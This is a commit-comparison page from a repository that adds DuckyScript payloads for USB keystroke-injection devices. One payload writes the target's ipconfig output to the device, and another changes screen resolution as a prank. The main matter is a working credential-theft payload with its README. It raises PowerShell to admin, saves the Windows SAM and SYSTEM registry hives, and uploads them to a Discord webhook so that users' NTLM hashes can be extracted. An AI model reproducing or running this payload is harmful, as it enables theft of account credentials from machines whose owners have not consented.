Compare commits
10 Commits
29ca18d648
...
39b4b43c7b
| Author | SHA1 | Date |
|---|---|---|
Mavis Coffey
|
39b4b43c7b | |
Peaks
|
675972662a | |
Luu
|
0df3011601 | |
|
Luu
|
a81ecd3e64 | |
|
Luu
|
c898ed7858 | |
|
Luu
|
15f8f25701 | |
|
Mavis Coffey
|
cf0c83d37c | |
|
Mavis Coffey
|
8293bf5d4d | |
|
Mavis Coffey
|
6ad0b7836c | |
|
mavisinator30001
|
8073d4d9cd |
|
|
@ -0,0 +1,21 @@
|
|||
REM Title: IP-Out
|
||||
REM Author: Mavisinator30001
|
||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||
REM Target: Any Windows System
|
||||
REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRING Powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
|
||||
ENTER
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ATTACKMODE OFF
|
||||
REM And should the attacker want to make sure the payload was successful:
|
||||
WAIT_FOR_BUTTON_PRESS
|
||||
ATTACKMODE STORAGE
|
||||
|
|
@ -0,0 +1,28 @@
|
|||
# Exfiltrate NTLM Hash - Windows ✅
|
||||
|
||||
A script used to exfiltrate the NTLM hash on a Windows machine.
|
||||
|
||||
## Description
|
||||
|
||||
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Discord webhook URL
|
||||
* Ensure the webhook permissions are configured
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Luu176 </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/luu176">
|
||||
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
|
|
@ -0,0 +1,34 @@
|
|||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
|
||||
GUI d
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||
DELAY 3000
|
||||
LEFTARROW
|
||||
ENTER
|
||||
DELAY 3000
|
||||
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
|
||||
DELAY 500
|
||||
GUI d
|
||||
|
|
@ -0,0 +1,59 @@
|
|||
REM TITLE Resolution Prank
|
||||
REM AUTHOR Mavisinator30001
|
||||
REM TARGET Any system running Windows 10/11
|
||||
REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||
LED_G
|
||||
DELAY 500
|
||||
CTRL GUI d
|
||||
DELAY 500
|
||||
GUI i
|
||||
DELAY 2000
|
||||
STRING display
|
||||
ENTER
|
||||
DELAY 2500
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
REPEAT 8 TAB
|
||||
ENTER
|
||||
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||
HOLD DOWN
|
||||
DELAY 1000
|
||||
RELEASE DOWN
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||
VAR $LIGHT_UP_TIMES = 20
|
||||
WHILE ($LIGHT_UP_TIMES > 0)
|
||||
LED_G
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
LED_R
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||
END_WHILE
|
||||
WAIT_FOR_CAPS_CHANGE
|
||||
END_WHILE
|
||||
DELAY 300
|
||||
REPEAT 12 TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
HOLD UP
|
||||
DELAY 1000
|
||||
RELEASE UP
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 200
|
||||
CTRL GUI F4
|
||||
Loading…
Reference in New Issue